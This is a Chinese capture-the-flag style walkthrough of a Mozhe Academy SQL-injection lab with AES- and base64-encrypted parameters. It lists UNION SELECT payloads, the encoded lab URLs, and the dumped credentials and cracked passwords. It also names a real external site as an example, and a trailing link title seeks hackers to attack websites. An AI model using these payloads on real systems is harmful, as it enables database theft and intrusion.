SQL注入防御之参数加密
AES加密SQL参数靶场练习
资源路径: 墨者学院-在线靶场-数据库安全-SQL注入漏洞测试(参数加密)
技能要求: 信息泄露方式+AES加解密+PHP语法+手工SQL注入+mysql数据库结构
目标: 通过SQL注入方式,获取WEB业务系统的账号密码进行登录。
通关测试:
首先访问目标
使用AWVS先扫一遍:http://219.153.49.228:41606
使用浏览器访问扫描到的URL:
http://219.153.49.228:41606/news/list.php?id=ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09
然后访问 http://219.153.49.228:41606/news,可以看到一个list.zip文件,下载
解压之后是一个list.php文件,内容如下:
加密方式为AES加密,然后再进行base64加密,因此将上述的id值(ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09)解密,先通过base64解密(eII8c3JeL0t0dxM7wb3Nzg==),然后再进行AES解密,可以得到值为1_mozhe
后面判断语句则是:先对通过?id=注入的数据解密得到明文进行判断是否后六个字符为_mozhe,因此可以据此构造sql语句
联合查询: -1 union select 1,2,3_mozhe,报错
sql语句: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDdFI5aFpFcFUxTkUrL0JJd2JYSHlLbz0=
通过测试可知payload应为-1 union select 1,2,3,4_mozhe
AES加密结果: xgd58ipTrnx8VzSBJicqCo3+zFFzhay5byFU3cjbdeI=
base加密结果:
eGdkNThpcFRybng4VnpTQkppY3FDbzMrekZGemhheTVieUZVM2NqYmRlST0=
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDbzMrekZGemhheTVieUZVM2NqYmRlST0=
有回显2,3,因此存在SQL注入漏洞,可以进行SQL注入
数据库查询:
payload: -1 union select 1,database(),3,4_mozhe
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDa2ZhOGJhWTFnQy9yYm9uL2JvZVdSdGM1eUdzNk5KUi91d1RDL1I2MWRYSQ==
得到数据库名: mozhe_Discuz_StormGroup
数据库中的表查询:
payload: -1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=“mozhe_Discuz_StormGroup”_mozhe
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDdG54VWtMbVR5VEJBa1lxMFlvdEIrMlRVbHhpYVpIeitwRlhKSkFqazd3N21XYTFoOGJ1V1ZtMUwxRm56SkJ5VVU3S0FYeGFIbDkyd0xBS1VyR2FiekxGaExqT0tWR3d4cFpWV1dqaHRSOVdqazFyV1Nnb3JPOWJNeXk3UnhEREVhckhTcFpxbTZSNSt4dFBBRmJ1QXhnZHdDZkMvT0VVdGFmK2ZlTjRSc0xq
得到表名: StormGroup_member,notice
字段名查询
-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=“StormGroup_member”_mozhe
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDdXZ6d1EwNGthL1B1YkJOa0tKeUpFVFV3L3phV0d6QUtiajhvTTFSUWJoV0JaYXRCVWt1WWUreiswdDhJbnpLUXg2N2xuMHJMb2hJM0NWVWtrWlZuRGs3VGVUUHgwS1Y1VDg1ZFVxdy9ZcUN0M3lITk8rTVorRlppNTZBTExqSjdMMU45bTl4alVCUzg5ZFhERVRBSVZNPQ==
得到各字段名: id,name,password,status
字段内容查询:
payload: -1 union select 1,group_concat(name,%3a,password),3,4 from StormGroup_member_mozhe
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDcktrNkQ2cFlZbEZQUFFiOWpHYlZrVDZTcTM0MWRVQStqQWVoeUFzRkdFTWtkR0VCeCt0Y1NkMDFHeFI3MW9RSWNlTlNGOUxpMnRudHRpc3g3cGhmRkk9
得到各字段内容:
mozhe356f589a7df439f6f744ff19bb8092c0,mozhee67edd40790332ed0ff9e137f3bca069
MD5解密: mozhe: dsan13 mozhe: 911208
登陆网站后台
Base64加密SQL参数实例分析
实例站点: https://www.inkomet.com/detail.php?id=MQ==
数值1用base64编码为:MQ==
数值2用base64编码为:Mg==
SQL注入防御之参数加密相关推荐
- SQL注入防御之二——注入关键词过滤(PHP)
SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 概述 欢迎来到本人的SQL注入防御系列的第二篇文章, ...
- hibernate防止sql注入对参数赋值传参数的例子
来源于:https://my.oschina.net/u/1754093/blog/707083 1.按参数名称绑定 在HQL语句中定义命名参数要用":"开头,形式如下: Quer ...
- 网络安全之SQL注入
文章目录 SQL注入的定义 SQL注入为什么会成功? 为什么发生SQL注入? SQL注入的分析 SQL的注入流程 判断SQL注入点 判断注入类型 SQL注入的通常方法 防止SQL注入 SQL注入的定义 ...
- 本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)
目录 注册登录模块 源码 测试 源码加固 文件上传模块 源码 测试 源码加固 发布动态模块 源码 测试 源码加固 本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解. 源码:利用PHP开发具 ...
- web 漏洞入门之 —— SQL 注入教程
SQL 注入是最常见.最被人们熟知的 web 漏洞.根据百科的解释:所谓SQL注入,就是通过把SQL命令,插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. ...
- mysql注入漏洞语句,web安全之sql注入漏洞
概念 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.通俗地讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力 ...
- 从sql注入到getshell (内附sqlmap的os-shell遇到中文路径的解决办法)
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员--君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文 ...
- 2022-10-10(通达OA SQL注入漏洞)
文章目录 漏洞描述 环境搭建 漏洞利用 id参数存在sql注入 starttime参数 orderby参数 id参数存在sql注入 修复建议 参考 漏洞描述 通达OA 11.5版本,存在sql注入 环 ...
- asp.net 全局sql注入处理 sql关键字过滤 global过滤sql
asp.net 全局sql注入处理 sql关键字过滤 global //当前请求对象private HttpRequest request;//当前响应对象private HttpResponse r ...
最新文章
- 加州理工让无人机长出腿:走路飞行无缝切换,还能玩滑板、走钢丝|Sicence子刊...
- AJAX框架构成设计,基于Ajax的Web框架设计与实现
- java string类型_java中String类型
- wav2midi 音乐旋律提取算法 附可执行demo
- serialization机制
- 关于c语言字符串函数和一些内存函数的的简介
- 安卓手机挂载Linux,android 挂载NFS教程
- 【AD】mm,mile,inch+电流大小同线宽关系
- perl的几个小tips
- 【图像评价】基于matlab图像去雾质量评价【含Matlab源码 066期】
- 中控考勤机官方开发包java,zkteco iface702 中控考勤机java开发步骤一---连接考勤机...
- Sklearn官方文档中文整理4——随机梯度下降和最近邻篇
- 计算机机房防火门,弱电机房门为防火门吗
- hadoop - hadoop2.6 伪分布式 示例 wordcount 分词 和 hdfs常用操作命令
- SkeyeVSS将安防网络摄像机进行类似于萤石云、乐橙云等模式的互联网视频云直播的几种方案
- 英伟达DeepStream学习笔记45——deepstream 绘制感兴趣ROI区域 绘制矩形框
- 微信小程序测试过程中的各个要点(干货)
- 硅片检测半导体运动台控制器的设计
- AT指令EGMR-修改设备的IMEI号码
- ColdQuanta与Classiq达成合作:加速100量子比特计算机实用化
热门文章
- EfficientDet(BiFPN)(CVPR 2020)
- 远程桌面的内容无法复制粘贴到本地的解决办法
- YUI3 event-base
- IIS网站404失效
- OS2.2.5:调度算法之时间片轮转调度、优先级调度、多级反馈队列调度
- vue网络图片url转Base64
- GT-suite v2016解决许可证过期问题(附新版liscense下载地址)
- 在赛灵思 Xilinx Vivado 中利用 report_qor_suggestions 提升 QoR
- java.lang.NullPointerException:null
- 寻找黑道高手一起黑网站玩